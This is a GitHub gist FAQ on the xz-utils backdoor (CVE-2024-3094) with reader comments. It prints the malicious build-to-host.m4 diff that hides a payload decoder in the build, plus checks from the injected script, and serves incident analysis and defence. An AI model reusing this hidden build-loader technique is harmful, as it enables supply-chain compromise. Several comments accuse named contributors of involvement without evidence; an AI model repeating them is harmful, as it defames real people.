Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active April 30, 2024 13:31
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

Guys, I know we can't read PRs anymore in xz repo, but as I said earlier this PR tukaani-project/xz#86 was about actor JiaT75 coordinating with actor xry111 to further like "completely fasten CRC manytimesfold".

Maybe the code in that particular PR is legit, BUT:

As per original Andres Freund discovery, this exploit is exploiting CRC routines. Also same xry111 previously contributed (approved other's PRs and reviewed PRs from others) from openssl (SSH is involved the backdoor)

That actor is involved in so many PR/commits/review in openssl and systemd, protobuf-c. llvms, util-linux. torvalds/linux, make-ca, cpython, curl, libxcrypt, dosbox-x, rust...
16 repo contributed to this year, 47 repos in 2023, 38 in 2024.
Some of his PRs are reviewed in conjunction with xen0n or xry111 is reviewing PRs from him. xen0n has contributed 36 repos this year, 101 in 2023 and 136 in 2024.

They are participating to adding support for "Loongsong Chinese architecture", so that might explain their wide contributions, but everyone in their group https://github.com/loongson-community is accessing a large number of key open source projects
Overall they cover such a wide number of open source projects, rust, nodejs, mozilla repos...

I'm not saying all PRs are suspicious, but certainly an actor can coordinate between these components to push a few changes here an there to create some sophisticated exploit like the one showed here to exploit .

It's a Loong stretch, but Linux is like powering $400-500B Cloud/Saas revenue, not counting all standalone servers out there, All of that powering a large portion of the world's economy; so a motivated bad actor can definetaly afford taking a couple of years of good contributions to obfuscate and backdoor Linux.

The sophistication of the current attack is an indicator all of packages these folks contributed need complete review of all PRs and commits from these folks.

thanks @ozars for this link:
https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPTSBnaXRodWJfZXZlbnRzIFdIRVJFIGFjdG9yX2xvZ2luPSd4cnkxMTEnIE9SREVSIEJZIGZpbGVfdGltZSBERVND

Using SELECT DISTINCT repo_name FROM github_events WHERE actor_login='xry111' ORDER BY file_time DESC

In the above will help assess how many linux core code are impacted by this actor/group (a lot).
image

Please comment on this, am I hallucinating ? This is a serious concern.
All original official projects these group touched need complete review of that group's contribution to their code, if you know them, please get their feedback on the topic

Coordinated changes to kernel, build tools, core deamons library and drivers is definitely possible after gaining trust over legit contributions by many different accounts over the course of many years for a motivated threat actor.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.

For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.

As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.

Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

Thanks for replying, I'm sorry if I'm overstretching this and you are innocent. My second post arrived in the mean time. We need all original project maintainers to review all your group's contributions as some legit contributions might have been used to obfuscate other backdoor-allowing code in systemd, llvm, make, openssl...

I was already suspicious seeing none of your group are actual official employees of Loongson.

@Artoria2e5
Copy link

Artoria2e5 commented Mar 30, 2024

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

@Z-nonymous
Copy link

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

Again sorry if i'm over stretching, I'd love to be wrong.

Again CRC, systemd, SSL cordinated changes that are exploited by this backdoor payload. hundreds of billions of potential ransomware $
I'm not buying anything other than the original code maintainers, of the touched repos to validated all that group's contribution.

I'm not disclosing my indentity because it's not needed to participate in github, which is why such elaborate attack is possible.

@lhmouse
Copy link

lhmouse commented Mar 30, 2024

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

@Artoria2e5
Copy link

Artoria2e5 commented Mar 30, 2024

Shall we look at the things you linked to then?

CRC: loongarch isn’t even being attacked here. Changing to that specialized implementation on a not-x86 architecture has no effect on x86-64, which is our target.

Systemd: what do you expect removing the "pure" attribute to do? It does not cause systemd to load liblzma if it previously did not, that I know.

SSL warning: it’s not even a security warning, it’s an annoying usage warning from OpenSSL. Command-line OpenSSL.

@Z-nonymous
Copy link

That sounds like a dangerous slippery slope stemming from confirmation bias. I suggest focusing on processes, not on people, and especially avoiding inflammatory language.

Thanks I'll stop there, I know maintainers of a lot of these projects are overworked, sometimes it's a side project, and welcome contributors. Lasse seems the example with emails explaining he has issues continue maintaining, while people pressuring for updates.

I just want all of these project original owners to understand the potential bigger issue that needs reviewing. This is highly sophisticated attack, involving CRC, SSL, systemd, make, I hope forensics get to the full explanation, but all the critical path to get such a backdoor in stealthly is touched by this group of enthousiast.

I'm also saying I could be wrong, but this needs thorough investigation.
On an OS that is powering almost every server and containers out there. Backdoor root access.

@taoky
Copy link

taoky commented Mar 30, 2024

https://web.archive.org/web/20240329180818/https://github.com/tukaani-project/xz/pull/86

The attacker only participates in reviewing the pull request (and it's the only open PR in xz repo at that time). Please stop making unreasonable accusation towards innocent developers.

@Z-nonymous
Copy link

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

傻逼

I don't say it's China, imagine the benefit to Proprietary OS if Linux is compromised.
It could be US criminals pretendy to be from China.

I did not accuse China in any case just pointed a group that is pretending to add support for a Chinese CPU. When it's not the official product officials. So it could even be a simple stateless agent.

@erinacio
Copy link

Everyone, if you think any repo that could be affected needs a security audit, please open issues there asking for that, or simply contact the maintainers in person. There's no reason for advocating witch-hunting here. Please stop accusing others with vague evidences.

@Fearyncess
Copy link

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

傻逼

I don't say it's China, imagine the benefit to Proprietary OS if Linux is compromised. It could be US criminals pretendy to be from China.

I did not accuse China in any case just pointed a group that is pretending to add support for a Chinese CPU. When it's not the official product officials. So it could even be a simple stateless agent.

quote-talk-is-cheap-show-me-the-code-linus-torvalds-45-66-13

@MingcongBai
Copy link

MingcongBai commented Mar 30, 2024

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

傻逼

I don't say it's China, imagine the benefit to Proprietary OS if Linux is compromised. It could be US criminals pretendy to be from China.

I did not accuse China in any case just pointed a group that is pretending to add support for a Chinese CPU. When it's not the official product officials. So it could even be a simple stateless agent.

Eh.

Look dude, I'd be more careful with this kind of accusation. It's more than a little funny seeing you mention my name and then invalidating all of our (can friendship and passion not exist in China) work. How dare you.

Go, look me up and rest assured that you will be disappointed.

It's normal be anxious or at least a little nervous about the aftermath of this drama, but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit. This is the only way forward that does not bring doom to open source collaboration and this international community that we have worked so hard to build (and, in case you're wondering about what we do, to convince employees and management at Loongson that an open and community-friendly policy is the way forward).

If you still believe in this, please don't disappoint.

EDIT: Grammatical fixes, you know, not my native tongue.

@mrbbbaixue
Copy link

mrbbbaixue commented Mar 30, 2024

From the perspective of Loongson Company, there is no reason for them to extensively modify the fundamental components of Linux merely to add a backdoor.
Maybe we should just stop accusing specific country, company, And just focus on this person who write this; and how to stop this.

@vtorri
Copy link

vtorri commented Mar 30, 2024

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

@DanielRuf
Copy link

relevant xkcd: https://xkcd.com/2347/

We had such cases before that in the npmjs ecosystem (and also PyPi).
Besides that, please everyone stick to the facts.

@herzeleid02 so far there is no active exploitation known. The installed version doesn't imply that you are truly affected - just that the version with the malicious test files and code is loaded. For the execution there are multiple requirements to be successful. Currently no one knows all, the list is just what Andres Freund found out.

We had big luck, because the performance regression was quickly detected and the code analyzed. I doubt that logging could be bypassed with this backdoor, So looking at the logs may show you, if anything relevant happened. But personally I think that nothing happened because the cover has been blown now and if any threat actor would exploit that now in a large scale, everyone would see that.

In the security world, you don't want to burn your exploits like this. Since this was planned by the involved person(s) for more than 2 years and the backdoor gradually implemented (probably to not get caught directly), there was probably some specific target (I guess not all of us) which is probably harder to hit (and so they took the long and complex route to obfuscate that as much as possible).

These are just my assumptions based on my experience in the field of cyber warfare, APTs and tactics involved in such things. The best way to hide something, is in plain sight. That also reminds me of bigger espionage cases.

@FlyGoat
Copy link

FlyGoat commented Mar 30, 2024

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.
For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.
As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.
Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

Thanks for replying, I'm sorry if I'm overstretching this and you are innocent. My second post arrived in the mean time. We need all original project maintainers to review all your group's contributions as some legit contributions might have been used to obfuscate other backdoor-allowing code in systemd, llvm, make, openssl...

I was already suspicious seeing none of your group are actual official employees of Loongson.

In your theory Linux could not exist because Linus was not an official employee of Intel.

Speaking for my self, supporting niche architectures in various FOSS softwares is my hobby over years. If you wish to check my identity, please go ahead, you'll find nothing more than a usual uni student trying to waste spare time on random stuff.

@schkwve
Copy link

schkwve commented Mar 30, 2024

but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit

How do these security audits work? I've never heard of security audits in OSS before.

@FlyGoat
Copy link

FlyGoat commented Mar 30, 2024

@DanielRuf
Copy link

How do these security audits work? I've never heard of security audits in OSS before.

@schkwve there are. For example the company Cure53 does such things. Also OpenSSL got audited multiple times:
https://duckduckgo.com/?t=ffab&q=cure53+security+audit+opensource&ia=web
https://duckduckgo.com/?q=openssl+security+audit&t=ffab&ia=web

Basically they read the code, run checks against the library (do some pentesting) and provide feedback based on the results.

Even the OpenSSF and Google sponsor security audits:
https://duckduckgo.com/?t=ffab&q=openssf+security+audit&ia=web

If you look for more details around this, you will find more details for sure.

@erinacio
Copy link

but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit

How do these security audits work? I've never heard of security audits in OSS before.

Security audits are more common in crypto or security related repos. Take gocryptfs as an example: https://defuse.ca/audits/gocryptfs.htm .

Informal audits could be taken just by manually reviewing all commit I think, but formal audits may require asking for some security consultants. Many potentially affected repos are backed by big? corps like Red Hat (taking systemd as example). They must know the correct person to contact to perform a security audit.

@herzeleid02
Copy link

herzeleid02 commented Mar 30, 2024

relevant xkcd: https://xkcd.com/2347/

We had such cases before that in the npmjs ecosystem (and also PyPi). Besides that, please everyone stick to the facts.

@herzeleid02 so far there is no active exploitation known. The installed version doesn't imply that you are truly affected - just that the version with the malicious test files and code is loaded. For the execution there are multiple requirements to be successful. Currently no one knows all, the list is just what Andres Freund found out.

We had big luck, because the performance regression was quickly detected and the code analyzed. I doubt that logging could be bypassed with this backdoor, So looking at the logs may show you, if anything relevant happened. But personally I think that nothing happened because the cover has been blown now and if any threat actor would exploit that now in a large scale, everyone would see that.

In the security world, you don't want to burn your exploits like this. Since this was planned by the involved person(s) for more than 2 years and the backdoor gradually implemented (probably to not get caught directly), there was probably some specific target (I guess not all of us) which is probably harder to hit (and so they took the long and complex route to obfuscate that as much as possible).

These are just my assumptions based on my experience in the field of cyber warfare, APTs and tactics involved in such things. The best way to hide something, is in plain sight. That also reminds me of bigger espionage cases.

Thanks a lot for the explanation. We still need to understand whats up with the payload and how the systems could be affected. There was some information how it injects an ssh auth function, but to actually exploit me you have to even know my ip adress, which sshd doesnt just advertise to the world. Journalctl seems fine and atimes of important stuff is ok, rpm -Va is ok too. Would they go that far?

@schkwve
Copy link

schkwve commented Mar 30, 2024

How do these security audits work? I've never heard of security audits in OSS before.

@schkwve there are. For example the company Cure53 does such things. Also OpenSSL got audited multiple times: https://duckduckgo.com/?t=ffab&q=cure53+security+audit+opensource&ia=web https://duckduckgo.com/?q=openssl+security+audit&t=ffab&ia=web

Basically they read the code, run checks against the library (do some pentesting) and provide feedback based on the results.

Even the OpenSSF and Google sponsor security audits: https://duckduckgo.com/?t=ffab&q=openssf+security+audit&ia=web

If you look for more details around this, you will find more details for sure.

Thanks for the links, It's been a bit of an eye opener about OSS security :p

Security audits are more common in crypto or security related repos.

That's probably why I haven't heard of security audits that much.

@cwegener
Copy link

@Z-nonymous You need to take a break from the Internet and get some fresh air.

@Exagone313
Copy link

Exagone313 commented Mar 30, 2024

Exhibit from my Libera IRC logs, IP is redacted for privacy.

#ubuntu/2024-01-30.log, UTC hours

[16:13:01] *** Joins: jiatan (~jiatan@redacted)
[16:16:24] <jiatan> Hello! I could not find this information on the Ubuntu docs after a bit of searching. Does Ubuntu LTS use packages from Debian Unstable or Debian Testing?
[16:18:51] <oerheks> jiatan, Unstable
[16:20:13] <jiatan> oerheks: Thanks!

edit: fixed date above, the 31 has only:

[11:49:53] *** Parts: jiatan (~jiatan@redacted) (Leaving)
$ whois redacted-ip
netname:        M247-LTD-Singapore
descr:          M247 LTD Singapore Infrastructure

As per https://spur.us/ it's from Witopia VPN

@cwegener
Copy link

from Witopia VPN

Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland China.

@yump
Copy link

yump commented Mar 30, 2024

@DanielRuf

In the security world, you don't want to burn your exploits like this. Since this was planned by the involved person(s) for more than 2 years and the backdoor gradually implemented (probably to not get caught directly), there was probably some specific target (I guess not all of us) which is probably harder to hit (and so they took the long and complex route to obfuscate that as much as possible).

If the perpetrator is an intelligence agency, I think the necessary preparation makes it less likely, not more likely, that there was a specific target in mind. Given that a backdoor into sshd takes years to insert, and is very useful capability to have, at a strategic level a good spy agency should be building such capabilities well in advance of learning what they are to be used for. When war looms you don't want to have to say, "Sorry boss, we can do that, but it'll take 2 years."

@lhmouse
Copy link

lhmouse commented Mar 30, 2024

from Witopia VPN

Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland China.

I'm online on Libera and OFTC almost everyday, and no VPN is required.

If someone cares about their privacy, they can get generic user cloaks, provided by libera.chat since its migration from freenode; and there is no necessity to connect via VPN.

@DanielRuf
Copy link

@yump we can't say, if this is the case. It was just some input from my point of view based on past experience. Especially when it comes to tactics. So far we don't have the full details about the backdoor.

We should concentrate on the relevant technical facts for now.

@DanielRuf
Copy link

@lhmouse @cwegener the country is probably a false flag. A VPN is meant to make it look like you are from a different country.

It's not the first time I had a case where a hacker used a VPN to conceal their true country. The IP address pointed to a completely different country. So that's why we should not jump to conclusions here.

Any serious security expert does not do that. Attribution is hard and not like "look, this was the IP address, so they are in this country".

@LaRevoltage
Copy link

@yump we can't say, if this is the case. It was just some input from my point of view based on past experience. Especially when it comes to tactics. So far we don't have the full details about the backdoor.

We should concentrate on the relevant technical facts for now.

Relevant technical fact is that this exploit isn't on a level with information security skills of an average developer. Not only it uses smart tactic to hide itself from the commit inspection with autoconf, but also has a sophisticated payload nature, which we still can't reverse after 16 hours past the incident.

There have been situation when the devs suddenly put malicious stuff in their project for various reason(GHSA-97m3-w2cp-4xx6) but the level of attack isn't comparable to this one. This is simply too good to be an exploit a normal developer wrote spontaneously.
It looks much more like a planned attack, which raises question about third party interference.

@mrbbbaixue
Copy link

from Witopia VPN 
Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland Mainland China.

Github, Libera, OFTC does not require VPN.
Moreover, These VPN services were blocked in Mainland China. Majority of Mainland China's VPN users use self-hosted servers to connect to HongKong SAR.

@marsmars0x01
Copy link

Exhibit from my Libera IRC logs, IP is redacted for privacy.

#ubuntu/2024-01-31.log, UTC hours

[16:13:01] *** Joins: jiatan (~jiatan@redacted)
[16:16:24] <jiatan> Hello! I could not find this information on the Ubuntu docs after a bit of searching. Does Ubuntu LTS use packages from Debian Unstable or Debian Testing?
